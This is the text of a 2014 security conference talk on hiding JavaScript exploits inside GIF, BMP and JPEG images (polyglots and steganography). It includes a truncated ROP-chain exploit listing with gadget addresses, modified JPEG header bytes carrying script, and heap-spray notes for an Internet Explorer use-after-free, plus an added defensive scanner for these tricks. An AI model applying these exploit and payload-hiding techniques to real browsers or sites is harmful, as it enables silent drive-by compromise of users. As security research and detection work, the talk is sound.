Hacking with Pictures 
net-square 
Saumil Shah 
Hack.LU 2014
Introduction
Saumil Shah
CEO, Net-Square
@therealsaumil
saumilshah
hacker, trainer, speaker, author - educating, entertaining and exasperating audiences since 1999
#who am i
CEO, Net-Square
Reverse Engineering, Exploit Writing, Penetration Testing, Offensive Security, Attack, Defense
Conference Speaker, Conference Trainer
Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi .... ... <insert buzzwordy appsec jargon here>
Avoiding Radar
JS Obfuscation
Broken File Formats
OLE Embedding
Javascript/Actionscript
Spreading the payload
Hiding In Plain Sight
Greetings Professor Falken
I'm an evil Javascript
I'm an innocent image
// JavaScript hidden inside the image on this slide (the slide cuts the listing off after "var retval")
// packv: packs a 32-bit value as a %u-escaped string, low word first
function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
var addressof=new Array();
addressof["ropnop"]=0x6d81bdf0;
addressof["xchg_eax_esp_ret"]=0x6d81bdef;
addressof["pop_eax_ret"]=0x6d906744;
addressof["pop_ecx_ret"]=0x6d81cd57;
addressof["mov_peax_ecx_ret"]=0x6d979720;
addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
addressof["mov_pecx_eax_ret"]=0x6d8eee01;
addressof["inc_eax_ret"]=0x6d838f54;
addressof["add_eax_4_ret"]=0x00000000;
addressof["call_peax_ret"]=0x6d8aec31;
addressof["add_esp_24_ret"]=0x00000000;
addressof["popad_ret"]=0x6d82a8a1;
addressof["call_peax"]=0x6d802597;
function call_ntallocatevirtualmemory(baseptr,size,callnum){
var ropnop=packv(addressof["ropnop"]);
var pop_eax_ret=packv(addressof["pop_eax_ret"]);
var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
var call_peax_ret=packv(addressof["call_peax_ret"]);
var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
var popad_ret=packv(addressof["popad_ret"]);
var retval=""
Avoid the EVIL eval()
var a = eval(str);
a = (new Function(str))();
Hat tip: Dr. Mario Heiderich @0x6D6172696F
Theory Becomes Practice - 2014
Hiding In Plain Sight
IMAJS
I IZ JAVASCRIPT!
Cross Container Scripting - XCS
<img src="itsatrap.gif">
<script src="itsatrap.gif"></script>
IMAJS – The Concept
• "Polyglot files"
  – term coined by Ange Albertini @corkami
• IMAJS is targeted towards browsers.
• It is a perfectly valid image...
• ...and a perfectly valid Javascript!
IMAJS-GIF Browser Support
Height Width   Browser/Viewer    Image Renders?   Javascript Executes?
2f 2a 00 00    Firefox           yes              yes
2f 2a 00 00    Safari            yes              yes
2f 2a 00 00    IE                no               yes
2f 2a 00 00    Chrome            yes              yes
2f 2a 00 00    Opera             ?                ?
2f 2a 00 00    Preview.app       yes              -
2f 2a 00 00    XP Image Viewer   no               -
2f 2a 00 00    Win 7 Preview     yes              -
IMAJS-BMP Browser Support
Height Width   Browser/Viewer    Image Renders?   Javascript Executes?
2f 2a 00 00    Firefox           yes              yes
2f 2a 00 00    Safari            yes              yes
2f 2a 00 00    IE                yes              yes
2f 2a 00 00    Chrome            yes              yes
2f 2a 00 00    Opera             yes              yes
2f 2a 00 00    Preview.app       yes              -
2f 2a 00 00    XP Image Viewer   yes              -
2f 2a 00 00    Win 7 Preview     yes              -
All new IMAJS-JPG!
• JPG is more powerful than other formats for hiding stuff.
• Thanks to EXIF data!
• JPG+JS
• JPG+HTML
• ...and JPG+JS+HTML!
Hat tip: Michael Zalewski @lcamtuf
The Secret Sauce

Regular JPEG Header
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C
01 2C 00 00 FF E2 ...
(FF E0 = start marker, 00 10 = length, 4A 46 49 46 00 = "J F I F 0", FF E2 = next section...)

Modified JPEG Header
FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C
01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ...
(FF E0 = start marker, 2F 2A = length: a whole lot of extra space!, 4A 46 49 46 00 = "J F I F 0", FF E2 = next section...)

The Secret Sauce
Modified JPEG Header - see the difference?
FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C
01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ...
(FF E0 = start marker, the length bytes 2F 2A read as "/*" = comment!, Javascript goes here in the extra space, FF E2 = next section...)
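Added example (not from the slides or the IMAJS tooling): a defender-side scanner for the three header tricks above, which parses the GIF, BMP and JPEG header layouts instead of trusting extensions or magic numbers, and flags the "/*" (2F 2A) placement in the GIF dimension field, the BMP file-size field and the JPEG APP0 length, plus any APP segment carrying JavaScript or HTML. Field offsets come from the format specifications, not the slides; the sample files are constructed inline (the GIF and BMP bodies are minimal stubs, not viewable images).

```python
import struct

JS_OPEN, JS_CLOSE = b"/*", b"*/"
HTML_TAGS = (b"<script", b"<html", b"<body")


def jpeg_segments(data):
    """Yield (marker, offset, length) for each length-prefixed segment before SOS/EOI."""
    pos = 2  # skip SOI (FF D8)
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return  # not at a marker: corrupt or truncated, stop parsing
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI / SOS: entropy-coded data follows
            return
        length = struct.unpack_from(">H", data, pos + 2)[0]  # counts its own 2 bytes
        yield marker, pos, length
        pos += 2 + length


def code_after_comment(data):
    """Return the bytes between the first '*/' and the next '/*' (b'' if no '*/')."""
    close = data.find(JS_CLOSE)
    if close < 0:
        return b""
    reopen = data.find(JS_OPEN, close + 2)
    return data[close + 2:reopen if reopen >= 0 else len(data)]


def scan_image(data):
    """Return a list of findings; an empty list means no IMAJS-style header trick."""
    findings = []
    if data.startswith((b"GIF87a", b"GIF89a")):
        # 'GIF89a' tokenises as a JS identifier; the logical screen width (offset 6)
        # and height (offset 8) follow as little-endian uint16 values.
        if data[6:8] == JS_OPEN:
            width = int.from_bytes(data[6:8], "little")
            height = int.from_bytes(data[8:10], "little")
            findings.append("GIF: width field is '/*' (width=%d, height=%d)" % (width, height))
    elif data.startswith(b"BM"):
        # 'BM' is an identifier too; the 4-byte file-size field at offset 2 is
        # ignored by most viewers, so it can hold '/*' without breaking the image.
        if data[2:4] == JS_OPEN:
            findings.append("BMP: file-size field starts with '/*'")
    elif data.startswith(b"\xff\xd8\xff"):
        for marker, off, length in jpeg_segments(data):
            if not 0xE0 <= marker <= 0xEF:
                continue  # only APPn segments (JFIF, EXIF, ...) carry free-form data
            app = marker - 0xE0
            if length == 0x2F2A:
                findings.append("JPEG: APP%d at offset %d has length 0x2F2A ('/*'): "
                                "%d bytes of comment-able padding" % (app, off, length))
            payload = data[off + 4:off + 2 + length].lower()
            if JS_CLOSE in payload or any(tag in payload for tag in HTML_TAGS):
                findings.append("JPEG: APP%d payload contains JavaScript/HTML" % app)
    else:
        return findings  # not a format this scanner understands
    if findings:
        code = code_after_comment(data)
        if code:
            findings.append("code after comment close: %r" % code[:48])
    return findings


def build_samples():
    """Constructed test files (not real IMAJS output): one benign, one polyglot per format."""
    js = b"*/='';alert(Date());/*"  # the snippet the slides show inside the padding
    jfif = b"JFIF\x00\x01\x01\x01\x01\x2c\x01\x2c\x00\x00"  # 14-byte APP0 body from the slide
    pad = b"A" * (0x2F2A - 2 - len(jfif) - len(js))  # fill the 12074-byte segment
    return {
        "benign_jpeg": b"\xff\xd8\xff\xe0\x00\x10" + jfif + b"\xff\xd9",
        "imajs_jpeg": b"\xff\xd8\xff\xe0/*" + jfif + js + pad + b"\xff\xd9",
        "benign_gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
        "imajs_gif": b"GIF89a/*\x00\x00\x00\x00\x00" + js + b";",
        "benign_bmp": b"BM\x3a\x00\x00\x00" + b"\x00" * 8,
        "imajs_bmp": b"BM/*\x00\x00" + b"\x00" * 8 + js,
    }


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(name, scan_image(blob) or "clean")
```

Because the check parses segment lengths and field offsets, it still fires when the file carries a harmless extension or a matching magic number.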
CANVAS / HTML5 for Exploit Dev
• jscript9.dll introduced many changes.
  – No %u0000 in strings.
  – No 0x00000000 in strings.
• Kills conventional Heap Sprays.
• <CANVAS> to the rescue!
• IE9 and above "support" HTML5.
• <!DOCTYPE html>
CANVAS for Exploit Dev
• Heap Sprays through Pixel Arrays!
• No character restrictions.
  – All pixels treated equally!
• And a bonus... ALPHA CHANNELS.
Stegosploit!
MS14-035 CInput Use-After-Free
IMAJS stego PWN!
< PAYLOADS GO back in time
Attack Timeline
MAY 2014
  GET /lolcat.png
  200 OK
  "I'M IN UR BASE" - JS exploit code encoded in PNG. (EVIL)
OCT 2014
  GET /decoder.jpg
  200 OK
  GET /lolcat.png
  304 Not Modified
  "....KILLING UR DOODZ" - decoder script references PNG from cache. (SAFE)
Conclusions - Offensive
• Lot of possibilities!
• Weird containers, weird encoding, weird obfuscation.
• Image attacks emerging "in the wild".
• Not limited to just browsers.
Conclusions - Defensive
• DFIR nightmare.
  – how far back does your window of inspection go?
• Can't rely on extensions, file headers, MIME types or magic numbers.
• Wake up call to browser-wallahs.
Greets and props
• Michael Zalewski @lcamtuf
• Ange Albertini @corkami
• @zer0mem
• Mario Heiderich @0x6D6172696F
• The fantastic crew of HACK.LU!
Saumil Shah
saumil@net-square.com
@therealsaumil
saumilshah